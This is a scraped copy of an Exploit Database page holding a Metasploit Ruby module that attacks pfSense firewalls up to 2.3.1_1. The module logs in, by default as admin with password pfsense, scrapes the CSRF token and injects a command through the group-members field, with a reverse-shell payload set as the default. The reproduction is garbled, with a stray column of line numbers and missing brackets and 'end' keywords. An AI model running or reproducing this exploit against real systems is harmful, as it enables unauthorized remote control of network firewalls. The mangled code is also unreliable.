pfSense – (Authenticated) Group Member Remote Command Execution (Metasploit)

Exploit Database
115 阅读

作者： Metasploit

日期： 2017-11-29
类别：
- remote
平台：
- unix
来源：https://www.exploit-db.com/exploits/43193/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(

update_info(

info,

'Name'=> 'pfSense authenticated group member RCE',

'Description' => %q(

pfSense, a free BSD based open source firewall distribution,

version <= 2.3.1_1 contains a remote command execution

vulnerability post authentication in the system_groupmanager.php page.

Verified against 2.2.6 and 2.3.

'Author'=>

[

's4squatch', # discovery

'h00die' # module

'References'=>

[

[ 'EDB', '43128' ],

[ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc']

'License'=> MSF_LICENSE,

'Platform' => 'unix',

'Privileged' => false,

'DefaultOptions' =>

{

'SSL' => true,

'PAYLOAD' => 'cmd/unix/reverse_openssl'

'Arch' => [ ARCH_CMD ],

'Payload'=>

{

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'perl openssl'

}

'Targets'=>

[

[ 'Automatic Target', {}]

'DefaultTarget' => 0,

'DisclosureDate' => 'Nov 06 2017'

)

register_options(

[

OptString.new('USERNAME', [ true, 'User to login with', 'admin']),

OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']),

Opt::RPORT(443)

], self.class

)

end

def login

res = send_request_cgi(

'uri' => '/index.php',

'method' => 'GET'

)

fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?

fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200

/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body

fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?

vprint_status("CSRF Token for login: #{csrf}")

res = send_request_cgi(

'uri' => '/index.php',

'method' => 'POST',

'vars_post' => {

'__csrf_magic' => csrf,

'usernamefld'=> datastore['USERNAME'],

'passwordfld'=> datastore['PASSWORD'],

'login'=> ''

}

)

unless res

fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")

end

if res.code == 302

vprint_status('Successful Authentication')

return res.get_cookies

else

fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")

return nil

end

def detect_version(cookie)

res = send_request_cgi(

'uri' => '/index.php',

'method' => 'GET',

'cookie' => cookie

)

unless res

fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")

end

/Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body

if version

print_status("pfSense Version Detected: #{version}")

return Gem::Version.new(version)

end

# If the device isn't fully setup, you get stuck at redirects to wizard.php

# however, this does NOT stop exploitation strangely

print_error("pfSens Version Not Detected or wizard still enabled.")

Gem::Version.new('0.0')

end

def check

begin

res = send_request_cgi(

'uri' => '/index.php',

'method'=> 'GET'

)

fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?

fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200

if /Login to pfSense/ =~ res.body

Exploit::CheckCode::Detected

else

Exploit::CheckCode::Safe

end

rescue ::Rex::ConnectionError

fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

end

def exploit

begin

cookie = login

version = detect_version(cookie)

vprint_good('Login Successful')

res = send_request_cgi(

'uri'=> '/system_groupmanager.php',

'method' => 'GET',

'cookie' => cookie,

'vars_get' => {

'act' => 'new'

}

)

/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body

fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?

vprint_status("CSRF Token for group creation: #{csrf}")

group_name = rand_text_alpha(10)

post_vars = {

'__csrf_magic' => csrf,

'groupname' => group_name,

'description' => '',

'members[]' => "0';#{payload.encoded};'",

'groupid' => '',

'save' => 'Save'

}

if version >= Gem::Version.new('2.3')

post_vars = post_vars.merge('gtype' => 'local')

elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed

post_vars = post_vars.merge(

'act' => '',

'gtype' => '',

'privid' => ''

)

end

send_request_cgi(

'uri' => '/system_groupmanager.php',

'method'=> 'POST',

'cookie'=> cookie,

'vars_post' => post_vars,

'vars_get' => {

'act' => 'edit'

}

)

print_status("Manual removal of group #{group_name} is required.")

rescue ::Rex::ConnectionError

fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

end